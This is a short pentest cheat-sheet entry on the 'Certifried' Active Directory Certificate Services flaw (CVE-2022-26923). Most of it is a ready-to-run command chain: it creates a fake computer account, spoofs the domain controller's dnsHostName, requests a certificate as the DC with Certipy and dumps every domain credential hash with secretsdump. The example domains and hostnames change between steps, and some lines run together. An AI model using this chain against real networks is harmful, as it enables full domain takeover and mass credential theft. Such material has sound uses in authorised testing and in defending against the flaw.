Certifried
User template certificate would identify and distinguish the certificate with the User Principal Name(UPN) of the certificate as SubjectAltRequireUpn is in the msPKI-Certificate-Name-Flag attributes. However, Machine template distinguish computer accounts’ certificates only by dnsHostName attribute which can be edited out and cause confusion in the KDC and attacker can request certificate as DC instead of the legitimate computer and results in a DCSync attack.
- Add a fake computer account with PowerMad or addcomputer.py
# Powermad
New-MachineAccount -MachineAccount 'FakeComputer' -Password (ConvertTo-SecureString -AsPlainText -Force 'Password123') -Domain domain.local -DomainController dc.domain.local -Verbose
# impacket
addcomputer.py domain.local/john:'Passw0rd1' -method LDAPS -computer-name 'JOHNPC' -computer-pass 'Password123'- Clear the SPNs attributes that relates to the current
dnsHostNameattribute.
addspn.py --clear -t 'FakeComputer$' -u 'domain\user' -p 'password' 'DC.domain.local'- Change dnsHostName attribute matching the domain controller
# RSAT
Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.comNote that above steps 1-3 could be automated with my messy script certifried.py
python3 certifried.py range.net/peter:'Welcome1234' -dc-ip 192.168.86.182- Request certificate with Certipy
certipy req -u 'WIN-JLSLKICW6EP\$' -p 'PY2nc0ubG8WT' -target ca01.range.net -ca range-CA01-CA -template Machine- Authenticate with the requested certificate earlier
certipy auth -pfx dc01.pfx -dc-ip 192.168.86.182- DCSync and win
secretsdump.py domain.local/dc01\$@10.10.10.10 -just-dc -hashes :000000000000000- It is always recommended to cleanup the created computer account. (This requires a privileged account)
addcomputer.py range.net/Administrator:'Password123' -computer-name 'WIN-EAZXIGMWO1T$' -computer-pass 'mi#gKKWFlzxJ' -dc-ip 192.168.86.182 -deleteFor the details explanation of the vulnerability (CVE-2022-26923), you may read the full article here
ADCS References